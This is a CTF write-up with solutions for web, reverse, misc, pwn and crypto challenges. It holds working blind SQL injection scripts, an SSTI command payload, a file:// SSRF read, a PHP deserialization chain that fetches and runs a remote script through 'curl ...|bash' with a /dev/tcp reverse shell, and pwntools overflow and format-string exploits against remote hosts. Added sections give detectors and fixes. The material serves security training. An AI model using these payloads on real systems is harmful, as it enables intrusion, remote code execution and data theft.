Once a year.

WEB

0x00 Welcome2021

WELCOME /f1111aaaggg9.php HTTP/1.1
Host: 1.14.102.22:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

0x01 babysql

The one I wanted to use was not filtered, nice~

admin'^1^1# gives the hint: your uname:admin and your pwd:123456

admin'^0^1# gives the hint: wrong username or password

Using admin'^(length(database())=7)^1# we learn that the database name is 7 characters long.

Dump the database name; it turns out to be babysql:

import requests

url = r"http://47.100.242.70:4339/index.php"

# Boolean-based blind: the XOR chain is true only when the guessed byte matches,
# e.g. admin'^(ord(substr(database(),1,1))=199)^1#
payload1 = "admin'^(ord(substr(database(),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""

for i in range(1, 8):            # 7 characters, as found above
    for j in range(23, 123):     # printable ASCII range tried for each position
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'uname': payload, 'pwd': 'shaw'}
        # print(payload)
        s = requests.post(url, data=data).text
        if "admin" in s:         # "your uname:admin" only appears when the condition held
            name += chr(j)
            print(name)
            break

Using admin'^((select(length(group_concat(TABLE_NAME)))from(information_schema.tables)where(table_schema="babysql"))=14)^1# we learn that the concatenated table names are 14 characters long; dumping them gives jeff,jeffjokes:

payload1 = "admin'^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='babysql')),"
payload2 = ",1))="
payload3 = ")^1#"

Next the column names. First the length of the columns of jeff, which is 23: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeff"))=23)^1#

The length of the columns of jeffjokes is 31: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeffjokes"))=31)^1#

Not knowing which one it was, I tried both and neither fit. It felt like I was in the wrong database, and I really was, haha ^^:

payload1 = "admin'^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),"
payload2 = ",1))="
payload3 = ")^1#"

Changing the query and running it reveals the flag database, with table fllag and column fllllllag, whose value is 22 characters long: admin'^((select(length(group_concat(fllllllag)))from(flag.fllag))=22)^1#

Finally, dump the value:

import requests
import time

url = r"http://47.100.242.70:4339/index.php"

# e.g. admin'^(ord(substr((select(fllllllag)from(flag.fllag)),1,1))=103)^1#
payload1 = "admin'^(ord(substr((select(fllllllag)from(flag.fllag)),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""

for i in range(1, 26):           # the value was found to be 22 characters long
    for j in range(23, 130):
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'uname': payload, 'pwd': 'shaw'}
        # print(payload)

        s = requests.post(url, data=data).text
        if "admin" in s:
            name += chr(j)
            print(name)
            time.sleep(1)        # go easy on the target between positions
            break
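From the other side of the wire, the probes above have a very recognisable shape: a quote followed by an operator, ord(substr(...)), information_schema, a trailing comment marker, and dozens of requests from one source that differ only in a number. The following is an added example of mine, not part of the original write-up: a small detector run over a constructed application log that records POST bodies (the log format, the addresses and the helper names are my assumptions). It flags the individual indicators and then groups probes by template so a blind extraction loop stands out as many hits on one template from one source.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample of an application log that records the POST body of each login
# attempt (not from the write-up): source, method, path and raw body, space separated.
SAMPLE_LOG = """\
10.0.0.5 POST /index.php uname=admin&pwd=123456
10.0.0.9 POST /index.php uname=admin'^(ord(substr(database(),1,1))=98)^1#&pwd=shaw
10.0.0.9 POST /index.php uname=admin'^(ord(substr(database(),1,1))=99)^1#&pwd=shaw
10.0.0.9 POST /index.php uname=admin'^(ord(substr(database(),2,1))=97)^1#&pwd=shaw
10.0.0.9 POST /index.php uname=admin'^((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema='babysql'))=14)^1#&pwd=shaw
10.0.0.7 POST /index.php uname=o'brien&pwd=hunter2
"""

# Each indicator is one trait of the probes used in the write-up.
INDICATORS = [
    ("schema_probe", re.compile(r"information_schema", re.I)),
    ("char_extract", re.compile(r"\b(ord|ascii)\s*\(\s*(substr|substring|mid)\s*\(", re.I)),
    ("quote_break", re.compile(r"'\s*(\^|\|\||&&|\bor\b|\band\b)", re.I)),
    ("comment_tail", re.compile(r"(#|--\s|/\*)")),
]


def parse_line(line):
    src, _method, path, body = line.split(" ", 3)
    params = dict(kv.split("=", 1) for kv in body.split("&"))
    return src, path, {k: unquote_plus(v) for k, v in params.items()}


def indicators_for(value):
    return [name for name, rx in INDICATORS if rx.search(value)]


def template(value):
    """Collapse numeric literals so the probes of one extraction loop share a key."""
    return re.sub(r"\d+", "N", value)


def analyse(log_text):
    findings = []          # (source, parameter name, indicator names)
    loops = Counter()      # (source, template) -> number of probes
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, _path, params = parse_line(line)
        for name, value in params.items():
            hits = indicators_for(value)
            if hits:
                findings.append((src, name, hits))
                loops[(src, template(value))] += 1
    return findings, loops


def suspicious_sources(log_text, min_probes=3):
    """Sources with at least min_probes flagged requests: the signature of a blind loop."""
    _findings, loops = analyse(log_text)
    per_src = Counter()
    for (src, _tpl), n in loops.items():
        per_src[src] += n
    return {src for src, n in per_src.items() if n >= min_probes}


if __name__ == "__main__":
    for src, param, hits in analyse(SAMPLE_LOG)[0]:
        print(src, param, hits)
    print("suspicious:", suspicious_sources(SAMPLE_LOG))
```

The o'brien line shows why the quote alone is not an indicator: a legitimate apostrophe without a following operator stays clean. The real fix on the server side is a prepared statement for the uname/pwd lookup, which makes the XOR trick fail regardless of what the log shows.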

0x02 babyxss

Anyone with hands and a brain can build this one by hand:

'<script>console.log("'+"<script>alalertert(1)</script>+'");</script>';
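The alalertert trick works because the filter removes the banned word in a single pass, so the two halves join back into alert once the middle copy is gone. As an added illustration (my code, not the author's), here is that filter shape beside two fixes: removing until a fixed point, which closes the re-assembly trick, and output encoding, which is the answer that does not depend on a word list at all.

```python
import html

PAYLOAD = "<script>alalertert(1)</script>"   # the inner payload from the write-up


def strip_once(s, banned=("alert",)):
    """Single-pass blacklist removal: the filter shape the payload defeats."""
    for word in banned:
        s = s.replace(word, "")
    return s


def strip_to_fixed_point(s, banned=("alert",)):
    """Repeat removal until nothing changes, so re-assembled words are removed too."""
    while True:
        t = strip_once(s, banned)
        if t == s:
            return t
        s = t


def render_untrusted(s):
    """Output encoding: markup is neutralised instead of filtered."""
    return html.escape(s, quote=True)


if __name__ == "__main__":
    print(strip_once(PAYLOAD))            # the word survives the filter
    print(strip_to_fixed_point(PAYLOAD))  # removed, but the surrounding tags still run
    print(render_untrusted(PAYLOAD))      # no tag is left to execute
```

Even the fixed-point version still leaves the script tags in place; only the encoded output is safe to put into a page, which is why blacklist filters are the wrong tool here.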

0x03 Baby_PHP_Black_Magic_Enlightenment

Level 1: enter the number in scientific notation to bypass the check.

Level 2: bypass it with a SHA-1 collision pair found via Google:

a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

Level 3: double URL encoding.

0x04 babyPy

SSTI:

{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

0x05 babyphp

Visiting noobcurl.php, the hint already says the flag is in the root directory, and there are no real restrictions:

http://47.100.242.70:4659/noobcurl.php?url=file://127.0.0.1/../../../../../../../flag
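The fetcher accepts any URL, so a file:// URL with a path-traversal tail reads the local filesystem. As an added example (mine, not the challenge's code), this is the allowlist check a URL-fetching endpoint should run before touching the network: only http/https, a host must be present, and loopback, private, link-local and similar literals are refused. The function name and return shape are my own.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_internal_host(host):
    """True for loopback/private/link-local/reserved IP literals and 'localhost'.
    Hostnames that are not literals need a resolve-then-check step (see note)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_fetch_url(url):
    """Return (ok, reason). Rejects non-HTTP schemes (file://, gopher://, ...) and internal targets."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if is_internal_host(host):
        return False, f"internal host {host!r}"
    return True, "ok"


if __name__ == "__main__":
    for u in ("file://127.0.0.1/../../../../../../../flag",   # from the write-up
              "http://127.0.0.1/", "http://[::1]/", "http://10.0.0.8/",
              "http://localhost:8080/", "http://example.com/page"):
        print(u, validate_fetch_url(u))
```

Two caveats for real deployments: a hostname must be resolved and the resulting address checked, and the connection must then be made to that same address (otherwise a DNS answer that changes between check and use gets around it); and every redirect target needs the same validation, since the first URL can be harmless and the 302 can point inside.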

0x06 蜜雪冰城甜蜜蜜

Open the F12 developer tools and change the id to 9.

0x07 babyPOP

The challenge source:

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}

Analysis: right after class c is unserialized, its __wakeup() sets a::$Do_u_like_JiaRan = true;

Class b can execute a system command, but only inside the magic method __toString(), which fires when the object is used as a string.

Only class d uses class b as a string (the concatenation in __invoke()), but class d itself has to be called as a function for that to happen.

Class e calls class d as a function (in __destruct()).

What remains is to connect class c to the rest of the chain: putting the class e object inside class c does it.

<?php
// Chain: c::__wakeup sets the JiaRan flag -> e::__destruct calls $afkl as a function
//        -> d::__invoke sets the AFKL flag and string-casts $value -> b::__toString runs exec()
class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct(){
        $this->i_want_2_listen_2_MaoZhongDu='curl http://ip:port/testdel|bash';
    }
}

class c {
    public $shawroot;           // holds the e object so it is destroyed with the chain
    public function __construct(){
        $this->shawroot=new e();
    }
}

class d {
    public $value;              // the b object, used as a string in __invoke()
    public function __construct(){
        $this->value=new b();
    }
}

class e {
    public $afkl;               // the d object, called as a function in __destruct()
    public function __construct(){
        $this->afkl=new d();
    }
}

$data=new c();
echo base64_encode(serialize($data));
?>

On the public VPS, testdel contains the following; a listener has to be running before the challenge performs the curl:

bash -i >& /dev/tcp/ip/port 0>&1

REVERSE

0x00 easypyc

pyinstxtractor.py extracts the pyc; uncompyle6 then gives back the .py source, which is as follows:

# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.8.10 (default, Sep 28 2021, 16:10:42) 
# [GCC 9.3.0]
# Embedded file name: easypyc.py
whatbox = [0] * 256

def aaaaaaa(a, b):
    k = [0] * 256
    t = 0
    for m in range(256):
        whatbox[m] = m
        k[m] = ord(a[(m % b)])
    else:
        for i in range(256):
            t = (t + whatbox[i] + k[i]) % 256
            temp = whatbox[i]
            whatbox[i] = whatbox[t]
            whatbox[t] = temp


def bbbbbbbbbb(a, b):
    q = 0
    w = 0
    e = 0
    for k in range(b):
        q = (q + 1) % 256
        w = (w + whatbox[q]) % 256
        temp = whatbox[q]
        whatbox[q] = whatbox[w]
        whatbox[w] = temp
        e = (whatbox[q] + whatbox[w]) % 256
        a[k] = a[k] ^ whatbox[e] ^ 102


def ccccccccc(a, b):
    for i in range(b):
        a[i] ^= a[((i + 1) % b)]
    else:
        for j in range(1, b):
            a[j] ^= a[(j - 1)]


if __name__ == '__main__':
    kkkkkkk = 'Geek2021'
    tttttt = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]
    ssss = input('Please input your flag:')
    inp = [0] * len(ssss)
    if len(ssss) != 32:
        print('Length Error!!!!')
        exit(0)
    for i in range(len(ssss)):
        inp[i] = ord(ssss[i])
    else:
        aaaaaaa(kkkkkkk, len(kkkkkkk))
        bbbbbbbbbb(inp, 32)
        ccccccccc(inp, 32)
        for m in range(32):
            if tttttt[m] != inp[m]:
                raise Exception('sorry your flag is wrong')
            print('success!!!!!!')
            print('your flag is {}'.format(ssss))

Then I got stuck; refer to this.
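The write-up stops here, so the following is an added solver of my own, not the author's. The decompiled program is an RC4-style stream cipher with one extra constant (aaaaaaa is the key schedule, bbbbbbbbbb the keystream XOR with an added ^ 102) followed by two in-place XOR chains (ccccccccc). The keystream step is its own inverse; the XOR chains are undone by replaying each step in reverse order, with care for the wrap-around a[b-1] ^= a[0], which in the forward direction already sees the updated a[0]. The function names below are mine; the key and the target array are copied from the decompiled code.

```python
KEY = "Geek2021"
TARGET = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165,
          136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]


def ksa(key):
    """aaaaaaa: RC4-style key scheduling; returns the 256-entry state box."""
    box = list(range(256))
    k = [ord(key[m % len(key)]) for m in range(256)]
    t = 0
    for i in range(256):
        t = (t + box[i] + k[i]) % 256
        box[i], box[t] = box[t], box[i]
    return box


def keystream_xor(box, data):
    """bbbbbbbbbb: RC4-style output generation, each byte also XORed with 102. Self-inverse."""
    box = box[:]            # work on a copy so the caller's box stays reusable
    q = w = 0
    out = []
    for x in data:
        q = (q + 1) % 256
        w = (w + box[q]) % 256
        box[q], box[w] = box[w], box[q]
        e = (box[q] + box[w]) % 256
        out.append(x ^ box[e] ^ 102)
    return out


def mix(data):
    """ccccccccc: two in-place XOR chains (a[b-1] ^= a[0] sees the already-updated a[0])."""
    a = list(data)
    b = len(a)
    for i in range(b):
        a[i] ^= a[(i + 1) % b]
    for j in range(1, b):
        a[j] ^= a[j - 1]
    return a


def unmix(data):
    """Inverse of mix: undo each chain by replaying its steps in reverse order."""
    a = list(data)
    b = len(a)
    for j in range(b - 1, 0, -1):
        a[j] ^= a[j - 1]
    for i in range(b - 1, -1, -1):
        a[i] ^= a[(i + 1) % b]
    return a


def check(candidate, key=KEY):
    """The program's forward transform; a flag is accepted iff this equals TARGET."""
    return mix(keystream_xor(ksa(key), candidate))


def recover(target=TARGET, key=KEY):
    """Run the inverse: unmix, then strip the keystream by XORing with it again."""
    return keystream_xor(ksa(key), unmix(target))


if __name__ == "__main__":
    print(bytes(recover()).decode("latin-1"))
```

Because the state box is rebuilt from the key on every call, the same keystream is produced for encryption and decryption, which is exactly why the forward program had to call aaaaaaa before bbbbbbbbbb.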

MISC

0x00 What is this command

From the challenge description:

cat flag.png | base64 | base64 | tac | nl | sort -k 2 > flag.txt ;rm -f flag.png & nohup php -S 0.0.0.0:2333 >> /dev/null 2>&1 &

Visiting flag.txt gives the following content:

Since the lines were thoughtfully numbered, just sort them back into numeric order.

sort -n -t '       ' -k 1 t.txt > t2.txt

Then run tac once more and decode Base64 twice; the result is an image, which is the flag.
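To make the undo steps concrete, here is an added example of mine (not from the write-up) that emulates the scrambling pipeline in Python on a constructed stand-in for flag.png and then reverses it: sort on the nl number, drop the number, reverse the line order, decode twice. The 76-column wrapping mimics the base64 tool, and the tab after the line number is what nl emits, which is why the sort in the write-up needs a tab as its field separator.

```python
import base64


def wrap76(text):
    """Emulate the base64 tool's 76-column line wrapping."""
    return "\n".join(text[i:i + 76] for i in range(0, len(text), 76)) + "\n"


def scramble(raw):
    """Forward pipeline from the challenge: base64 | base64 | tac | nl | sort -k 2."""
    once = wrap76(base64.b64encode(raw).decode())
    twice = wrap76(base64.b64encode(once.encode()).decode())
    lines = twice.splitlines()
    lines.reverse()                                                   # tac
    numbered = [f"{n:6d}\t{line}" for n, line in enumerate(lines, 1)]  # nl
    numbered.sort(key=lambda s: s.split("\t", 1)[1])                  # sort -k 2
    return "\n".join(numbered) + "\n"


def unscramble(flag_txt):
    """Undo it: sort by the nl number, drop the number, tac, decode twice."""
    rows = [ln.split("\t", 1) for ln in flag_txt.splitlines() if ln.strip()]
    rows.sort(key=lambda r: int(r[0]))          # sort -n -k 1 (tab-separated)
    lines = [r[1] for r in rows]                # cut -f 2
    lines.reverse()                             # tac
    once = base64.b64decode("".join(lines))     # base64 -d ignores the line breaks
    return base64.b64decode(once)               # second base64 -d


# Constructed stand-in for flag.png (a PNG signature followed by filler), not the real file.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 3

if __name__ == "__main__":
    scrambled = scramble(SAMPLE_PNG)
    print(scrambled[:200])
    print(unscramble(scrambled) == SAMPLE_PNG)
```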

0x01 easysend

Install MetaMask and follow the tutorial.

0x02 easycreat

(1) First go to Remix: https://remix.ethereum.org

(2) Once Remix opens, click the example contract "ballot.sol" on the left.

(3) Go to the example contract's page on GitHub: click here

(4) Copy the complete example contract and replace the contract contents in Remix with it.

(5) Click Compile 3_Ballot.sol under the SOLIDITY COMPILER menu.

(6) Click Deploy under the DEPLOY & RUN TRANSACTIONS menu; before deploying, switch the environment to Injected Web3.

(7) MetaMask pops up a dialog; click confirm.

(8) Wait for the link to be generated.

0x03 每日一溜

Filter on http and extract a picture of Yuno (由乃) cupping her face; a zip is appended at its tail. Opening it gives:

vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/
FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB==

Decode it with this online custom-alphabet Base64 decoder to get the flag.
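The online decoder is doing nothing more than a character substitution, so the same thing can be done offline. As an added example (my code, not the write-up's), the decoder below maps the custom 64-character alphabet onto the standard one and hands the result to the standard decoder; the encoder is the same mapping in the other direction. The alphabet and the ciphertext are the two lines posted above; the alphabet sanity check is my own addition.

```python
import base64

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Both values as given in the write-up.
CUSTOM_ALPHABET = "vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/"
CIPHERTEXT = "FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB=="


def _check_alphabet(alphabet):
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    if "=" in alphabet:
        raise ValueError("'=' is reserved for padding")


def custom_b64decode(text, alphabet):
    """Map the custom alphabet onto the standard one, then reuse the standard decoder."""
    _check_alphabet(alphabet)
    table = str.maketrans(alphabet, STD_ALPHABET)
    return base64.b64decode(text.translate(table), validate=True)


def custom_b64encode(raw, alphabet):
    """Standard encoding, then the inverse character mapping."""
    _check_alphabet(alphabet)
    table = str.maketrans(STD_ALPHABET, alphabet)
    return base64.b64encode(raw).decode("ascii").translate(table)


if __name__ == "__main__":
    print(custom_b64decode(CIPHERTEXT, CUSTOM_ALPHABET))
```

str.maketrans builds the whole mapping at once, so an alphabet that reuses '+' and '/' in other positions (as this one does) is handled correctly; a naive sequential replace would not be.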

PWN

0x00 Love mini-game

So easy that even I had to gasp: just type 123.

0X01 Love mini-game 2.0

IDA 7.5 strips the obfuscation automatically; main is as follows:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[24]; // [rsp+0h] [rbp-20h] BYREF
  char s2[8]; // [rsp+18h] [rbp-8h] BYREF

  strcpy(s2, "hateyou");
  init(argc, argv, envp);
  puts(&s);
  read(0, buf, 0x20uLL);
  if ( !strcmp(love, s2) )
  {
    puts(&byte_402074);
    system("/bin/sh");
    exit(0);
  }
  puts(&byte_402098);
  return 0;
}

Make it equal to loveyou:

from pwn import *

elf = ELF('./pwn111')

local = 0
if local == 1:
    io = process('./pwn111')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('47.242.20.238',10000)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# buf is at rbp-0x20 and s2 at rbp-0x8, so 24 bytes of filler reach s2;
# read() takes at most 0x20 bytes, so only the first 32 bytes of the payload arrive.
payload = b'a'*(0x20-0x8) + b'loveyou\x00' + p64(0xdeadbeef)
io.recvuntil(b"\n")
io.recvuntil(b"\n")
io.sendline(payload)

io.interactive()

0x02 check in

Loop the calculation 200 times; nothing difficult:

from pwn import *

elf = ELF('./math')

local = 0
if local == 1:
    io = process('./math')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('123.57.230.48',12343)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

for i in range(1, 201):
    io.recvuntil(b"num1:")
    num1 = io.recvuntil(b"\n")[:-1]
    io.recvuntil(b"num2:")
    num2 = io.recvuntil(b"\n")[:-1]
    io.recvuntil(b"The sign of this calculation is ")
    function = io.recvuntil(b"\n")[:-1]
    # eval() on text received from the remote end: fine for a throwaway CTF script,
    # never for anything that talks to a server you do not control.
    calc = str(eval((num1 + function + num2).decode()))
    io.recvuntil(b"Give me your answer!!:\n")
    io.sendline(calc.encode())

io.interactive()

0x03 easyfmt

main contains nothing useful. vuln is as follows:

int vuln()
{
  char v1[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char format[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  int v3; // [esp+4Ch] [ebp-Ch] BYREF

  v3 = 666;
  puts("First step:");
  printf("%p\n", &v3);
  __isoc99_scanf("%13s", format);
  printf(format);
  if ( v3 != 12 )
    exit(0);
  puts("Second Step");
  puts("nice you enter there");
  __isoc99_scanf("%20s", v1);
  return printf(v1);
}

Besides vuln there is also a backdoor function, so the plan is: first make v3 = 0xC to satisfy the check, then make the return go to the backdoor.

Step one is to find which argument position we control. Testing shows it is the 15th, as the figure shows:

p32(v3) itself is 4 bytes; adding 8 more gives 12 (0xC). %8c means 8 padding characters.

from pwn import *

elf = ELF('./format_string')

local = 1
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048634')
    #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',26933)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil(b"First step:\n")
v3 = int(io.recvuntil(b"\n", drop=True), 16)   # the program prints &v3 itself
log.success('v3: ' + hex(v3))
# 4 address bytes + 8 padding characters = 12, written by %n through argument 15 (&v3)
payload = p32(v3) + b"%8c%15$n"
io.sendline(payload)

io.interactive()

Next, the return address has to be redirected to the backdoor. Testing shows that the 7th argument is controllable.

Breaking on the last printf in vuln and inspecting the stack shows that v3 is 0x10 (0xac-0x9c) away from the return address into main:

The target is 0x08048793 (backdoor) and the current value is 0x804873e, so only the low byte has to become 0x93. 0x93 is 147 in decimal; p32(v3+0x10) already accounts for 4 bytes, so 143 more are padded. The write width is chosen with hhn (n writes an int, ln a long int, hn a 16-bit word, hhn a single byte). The final payload:

from pwn import *

elf = ELF('./format_string')

local = 0
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048685')
else:
    io = remote('123.57.230.48',12342)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil(b"First step:\n")
v3 = int(io.recvuntil(b"\n", drop=True), 16)
log.success('v3: ' + hex(v3))
# step 1: v3 = 12 via argument 15
payload1 = p32(v3) + b"%8c%15$n"
io.sendline(payload1)
io.recvuntil(b"there\n")
# step 2: low byte of the return address (at v3+0x10) = 4 + 143 = 147 = 0x93 via argument 7
payload2 = p32(v3+0x10) + b"%143c%7$hhn"
io.sendline(payload2)

io.interactive()

CRYPTO

0x00 Classical music

Vigenère in one go; the key is flag.

0x01 Three works too

from Crypto.Util.number import getPrime,bytes_to_long
from flag import flag
flag = bytes_to_long(flag)
p = getPrime(100)
q = getPrime(100)
r = getPrime(100)
 
n = p*q*r
e = 65537
c = pow(flag, e, n)
 
print(n)
print(c)
 
'''
798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807
249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
'''

Factor n with yafu to get the three primes (no screenshot ^^); (p-1)*(q-1)*(r-1) is:

798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712

Compute d:

import gmpy2
gmpy2.invert(65537,798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712)
# gives mpz(40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929)

Compute the plaintext:

# flag = pow(c, d, n)
pow(249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575, 40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929, 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807)

which gives:

0x5359437b6e6f775f796f755f736f6c76655f69747d

As characters: SYC{now_you_solve_it}
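The steps above are the standard RSA recovery once the modulus is factored, and they work the same for any square-free modulus, not only a three-prime one. As an added example (mine, not the author's), the script below carries them through with nothing but the standard library: d from pow(e, -1, phi) (Python 3.8+) instead of gmpy2.invert, and int.to_bytes instead of long_to_bytes. n, c and phi are the values from this write-up; the small three-prime demo at the end uses constructed primes of my own to show the general procedure including the totient computation, which the write-up only states as a result.

```python
from math import prod

# Values from the write-up: n and c from the challenge output, phi from the factoring step.
N = 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807
C = 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
PHI = 798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712
E = 65537


def phi_from_factors(primes):
    """Euler's totient of a square-free modulus: the product of (p_i - 1)."""
    return prod(p - 1 for p in primes)


def rsa_decrypt(c, e, n, phi):
    """Textbook RSA with phi known: d = e^-1 mod phi, m = c^d mod n. Returns (m, d)."""
    d = pow(e, -1, phi)       # raises ValueError if gcd(e, phi) != 1
    return pow(c, d, n), d


def to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def solve():
    """Decrypt the challenge ciphertext; returns (plaintext bytes, d)."""
    m, d = rsa_decrypt(C, E, N, PHI)
    return to_bytes(m), d


def small_demo():
    """Constructed three-prime instance: totient from the factors, then encrypt and decrypt."""
    p, q, r = 61, 53, 47           # constructed primes, not the challenge's
    n = p * q * r
    phi = phi_from_factors([p, q, r])
    m = 42
    c = pow(m, E, n)
    return rsa_decrypt(c, E, n, phi)[0] == m


if __name__ == "__main__":
    plaintext, d = solve()
    print(plaintext, hex(d))
    print("small demo ok:", small_demo())
```

The only thing that changes with more primes is the totient; the decryption exponent and the final pow are identical, which is why a 100-bit-prime modulus offers no protection once any factoring tool can split it.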